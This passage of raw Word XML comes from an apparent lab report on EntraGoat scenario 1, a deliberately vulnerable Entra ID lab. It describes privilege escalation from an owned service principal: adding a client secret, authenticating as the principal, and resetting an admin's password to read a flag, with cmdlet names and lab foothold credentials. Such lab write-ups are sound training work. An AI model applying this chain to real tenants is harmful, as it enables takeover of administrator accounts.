            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="438B55F5" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confirmed via custom agent tooling and the portal that the SP holds Privileged Authentication Administrator (PAA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="536D72D1" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>entra_agent.py / Entra admin center</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="5F4A5FC1" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="658AC80B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18294775" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>As David (owner), added a new client secret to the SP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02A717D8" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Add-MgServicePrincipalPassword</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="550989C2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4348685A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BD80B21" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Authenticated as the service principal (app-only, client credential flow)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A2FC0F0" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Connect-MgGraph -ClientSecretCredential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="2FEBEB9F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69F6B7C2" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38F476FA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Used the SP's PAA privileges to reset the target admin's password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15852512" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Update-MgUser -PasswordProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="04A8CF71" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08BB0290" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="095E12F3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Read the flag from the admin's onPremisesExtensionAttributes.extensionAttribute1 via Graph, authenticated as the SP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7909B670" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Invoke-MgGraphRequest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="7D8FD8BF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B2AD321" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14F271DB" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Removed the added secret and ran the official cleanup script to restore tenant state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3406A25F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PowerShell / EntraGoat cleanup script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="127B071C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CC6A0F" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc243301431"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.1.1 Detailed Walkthrough with Evidence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="010D6D5D" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="1E3A5F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1–2 — Deployment and scenario setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2926D4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EntraGoat was deployed into the Pearson tenant via the PowerShell GUI, signed in as Global Administrator:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9500" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="334155"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="334155"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="2B43DCE9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F1A2B"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="74C38CFF"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git clone https://github.com/Semperis/EntraGoat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D05134B"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cd EntraGoat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C1D314"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Install-Module Microsoft.Graph -Scope CurrentUser -Force</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24CB6DE6"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.\Start-EntraGoat.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="657E8DA4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Scenario 1 setup (“Misowned and Dangerous: An Owner's Manual to Global Admin”) returned the low-privilege foothold credentials and the target identity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430CB2DB" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Username: david.martinez@wwlx961259.onmicrosoft.com  /  Password: GoatAccess!123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59365313" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Target: EntraGoat-admin-s1@wwlx961259.onmicrosoft.com  /  Flag location: extensionAttribute1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141DDFBD" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hint given by the scenario: “Ownership leaves a mark. Trace what entities bear your name.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D1559" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="1E3A5F"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 — Enumerating David Martinez's identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC8E04E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Signed in to the Entra admin center as david.martinez. His user profile showed zero owned applications, one group membership, and no assigned roles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7451FC88" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3579ADCB" wp14:editId="180D1825">
            <wp:extent cx="4953000" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2094295608" name="Grafik 209429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038475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0851D257" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="100" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 3. David Martinez — user overview: 1 group membership, 0 owned applications, 0 roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FEFA7E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Confirmed app registration ownership was empty:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC9807" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4963FD49" wp14:editId="1BF8BC0E">
            <wp:extent cx="4953000" cy="2371725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1957954712" name="Grafik 195795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371725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
